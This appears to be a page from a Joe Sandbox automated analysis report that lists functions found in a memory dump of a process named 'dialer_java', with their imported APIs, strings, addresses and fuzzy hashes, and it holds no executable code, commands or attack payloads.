Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction ID: 91f6eff30823404a7b7ac2406b6d116cb1ca3c986800526c4e39d626f38301ed
Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction Fuzzy Hash: 7D412223705B8581EB24CB2AE8857A93BA4EB08B84F184571DF8C9B7D5DE39D4E2C305

Function 00007FF6E3A82F20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6E3A82F8D
free.MSVCRT ref: 00007FF6E3A83093
LeaveCriticalSection.KERNEL32 ref: 00007FF6E3A830C7

Strings

, xrefs: 00007FF6E3A82F6D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: CriticalLeaveSectionfreememset
String ID:
API String ID: 1662925646-3916222277
Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction ID: 58f1ded4f77116610825af3293002ecd37fd399c47a20d71742da24c931c6268
Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction Fuzzy Hash: 3841F563B0468686EA258F28944537C7B61FB547A4F408231CAAFA37D1DE3AE9D6C305

Function 00007FF6E3A78FC0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A78FEC
realloc.MSVCRT ref: 00007FF6E3A790A9
realloc.MSVCRT ref: 00007FF6E3A79101
memcpy.MSVCRT ref: 00007FF6E3A7911B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction ID: eea63a4eb94fedb09f0a07712265e52f39613a41e78c6f70ab13fe61d006c57c
Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction Fuzzy Hash: 2241E3A3B05B8182EB298F29E4453A96760EB58BC4F048235DB9D47395EF2DD5D2C304

Function 00007FF6E3A79D00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A79D3C
realloc.MSVCRT ref: 00007FF6E3A79DC0
realloc.MSVCRT ref: 00007FF6E3A79E10
realloc.MSVCRT ref: 00007FF6E3A79E94

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction ID: 822315a8a4e12097bc08b2ea2ecff5b12f26bf6afd2cd9a30ae1a251d8d6388e
Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
Instruction Fuzzy Hash: 34518DB3A06B8682DF258F5AE444269B761FB58BC4F048132CB8E537A4DF3DE091C305

Function 00007FF6E3A7B9A0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7B9D6
realloc.MSVCRT ref: 00007FF6E3A7BA9E
realloc.MSVCRT ref: 00007FF6E3A7BB07
memcpy.MSVCRT ref: 00007FF6E3A7BB23

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction ID: 3c92a0d70687f39499c4f70bdbc5b7fabaaa4e18d0ff149fd022356a0fca06d0
Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction Fuzzy Hash: 5E41C1B3B06B8182EB158B19E4893697BA4EB44BC4F058231DFAD477A5DF2DD582C304

Function 00007FF6E3A75B70 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A75BAC
realloc.MSVCRT ref: 00007FF6E3A75C30
realloc.MSVCRT ref: 00007FF6E3A75C80
realloc.MSVCRT ref: 00007FF6E3A75CDB

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction ID: 2321a0e100fedb42fe811989a1b088b4e5c38a8473eadb321c73dbd9bae173d9
Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
Instruction Fuzzy Hash: 814170B3A06B8682DF249F5AE48436DB7A1EB58BC4F448131CB8E577A5EF3DD0818305

Function 00007FF6E3A82060 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 00007FF6E3A82086
fputc.MSVCRT ref: 00007FF6E3A82150

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputclocaleconv
String ID:
API String ID: 697933784-0
Opcode ID: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction ID: 4c3e860da28b129567ebe8463689e3d50db76f06b7044e1fbb2f97748d8e0bc2
Opcode Fuzzy Hash: e7dc6929fcf4cc6b6d4a8017c3bf5789be4cf754bd583aa0524452777b434767
Instruction Fuzzy Hash: 43417573F04181C6F3349A6AE58A37E7AA2EB14754F200135DB6E92BC1CE2DE5C28755

Function 00007FF6E3A7B760 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B7AA
realloc.MSVCRT ref: 00007FF6E3A7B80C
memcpy.MSVCRT ref: 00007FF6E3A7B826
realloc.MSVCRT ref: 00007FF6E3A7B85E

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction ID: f0bae6fea31ab01886099a9541d24e08b12f2263417d19f0ac09bfccbb03adc1
Opcode Fuzzy Hash: 0110527e016c01b0a12a7529867a8ac73845aff24685a5758aca368fee7433c9
Instruction Fuzzy Hash: 2A3184B3B05B8582DE299F5AF4953697761EB68BC4F048031CB9E577A5DF3DE4818300

Function 00007FF6E3A7DB70 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7DC32

Strings

struct, xrefs: 00007FF6E3A7DBD7
union, xrefs: 00007FF6E3A7DBE6
enum, xrefs: 00007FF6E3A7DBC8

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: enum$struct$union
API String ID: 2803490479-1076304440
Opcode ID: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction ID: 4874a9c49bc3ba4489e2e499f7aedbb11e7a81a74532f04778c1d1cc5cbb6038
Opcode Fuzzy Hash: 9eeface4d110fd4f93855d0c537ecc8917bf5016c94e455d4abe1fc3c89d10f7
Instruction Fuzzy Hash: 29310233709A8180E7048B19E49D77A3AA4EB84B91F544136DE4E973D0DE3DE4C7C305

Function 00007FF6E3A7E5F0 Relevance: 6.1, APIs: 4, Instructions: 98COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7E65A
realloc.MSVCRT ref: 00007FF6E3A7E6B3
memcpy.MSVCRT ref: 00007FF6E3A7E6CD
realloc.MSVCRT ref: 00007FF6E3A7E705

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction ID: 868bddec450fe1c302ee7394979b33f6387c275b810421be376b0ae191823204
Opcode Fuzzy Hash: 92ab20d4474b65fcd413b3cc6ffba1703cdc3f62fa15c2224de3fc87839058f1
Instruction Fuzzy Hash: 2431D2B3B05B8282DE298F1AF495379B761EB98BC0F048031CB8E57795EF3DE0818205

Function 00007FF6E3A6FF19 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7003A
realloc.MSVCRT ref: 00007FF6E3A700E0
malloc.MSVCRT ref: 00007FF6E3A700F9
memcpy.MSVCRT ref: 00007FF6E3A70114

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID:
API String ID: 2642181057-0
Opcode ID: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction ID: fc83c6b57ae336a6fc82d7920569253081d57ee7e42dc4009a6bd66bfa211d95
Opcode Fuzzy Hash: 7b5389b9c9a85f3a34e23261bf769740200db070f8f6c41ee47b25707c61576f
Instruction Fuzzy Hash: 06310233716B8185DA19CB29E4863A96B95FB08B94F440535CB9D9B3C9EF3DE182C304

Function 00007FF6E3A7C940 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7C9AA
realloc.MSVCRT ref: 00007FF6E3A7CA06
memcpy.MSVCRT ref: 00007FF6E3A7CA20
realloc.MSVCRT ref: 00007FF6E3A7CA58

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID:
API String ID: 1833655766-0
Opcode ID: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction ID: 2a37ebd2bde9c52cfa2e359ff06cc5a1038d5163dc761b815cfcdf04c4d7041f
Opcode Fuzzy Hash: 92f0a808aa39fa7eb3d3e1b92975e20d59c52e8dbb1dc89ffce3e6ef201c367b
Instruction Fuzzy Hash: B73191B3B05B4282DE29CF5AF495369A761EB58BC0F048432CB8E577A5EF3DE4818205

Function 00007FF6E3A77190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A77358
memcpy.MSVCRT ref: 00007FF6E3A77374

Strings

%af, xrefs: 00007FF6E3A7730A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: %af
API String ID: 2500458235-435209106
Opcode ID: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction ID: 132a56ace171dce0c6b008f01e9ede0559cc64fa2a8c8ed9bfbf884ba6b5d626
Opcode Fuzzy Hash: 189d169f33cf6af8ca0065567002fe4ddead3edd4c8bf95d75048c77e3cd1801
Instruction Fuzzy Hash: A851BC67B1C6C146D73A8738E580BAD7F61DB92391F048225DF6903BD5EE3EC6468704

Function 00007FF6E3A62410 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61247), ref: 00007FF6E3A62589

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF6E3A6270B
Unknown pseudo relocation protocol version %d., xrefs: 00007FF6E3A6271B

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction ID: 935f5c1914f639b3418274146c3cda340a5dab0d8f6aa5188ffe4ae25b3f3722
Opcode Fuzzy Hash: 5b47f7b3415e9acf973e285d3e0f13b1c7560d1d6d05a1c3766290b15ed4b865
Instruction Fuzzy Hash: 9A518C73F28586D6EB208B2DE8967A83B62EB14B54F044135D91DA3794CF3EE4C5C70A

Function 00007FF6E3A7BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7BF01
realloc.MSVCRT ref: 00007FF6E3A7BFEA

Strings

struct, xrefs: 00007FF6E3A7BED0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocrealloc
String ID: struct
API String ID: 948496778-3130185518
Opcode ID: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction ID: e537e3abeb30a899a12f0e75d329f2ffd475721a912e15c3f26371f293cb6b34
Opcode Fuzzy Hash: 35616c4f7b5d9537541ddb626232e0a783046c49ffb19191163ac48addb01a71
Instruction Fuzzy Hash: 0D41CB77B05B8581EB288B1AE4856A83B64FB59FD1F058232DF8C877A5DF39D492C304

Function 00007FF6E3A6EB10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A6EB49
realloc.MSVCRT ref: 00007FF6E3A6EBDD

Strings

ble for , xrefs: 00007FF6E3A6EB69

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: ble for
API String ID: 471065373-1503916205
Opcode ID: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction ID: c5b0fbef80065bd8349589cad3f07e78800b7ca378faefb03c38fc334cae78d0
Opcode Fuzzy Hash: 7d0b51c97a29845c4b7d3c5cbaae78ce6d4dab227ee38db279accd03066f3836
Instruction Fuzzy Hash: BE319CA3B06B4582EF298F1AE5452687B60FBA8FC0B048032CF9E57760DF2DE4918205

Function 00007FF6E3A6D2D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A6D313

Strings

std, xrefs: 00007FF6E3A6D36F

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

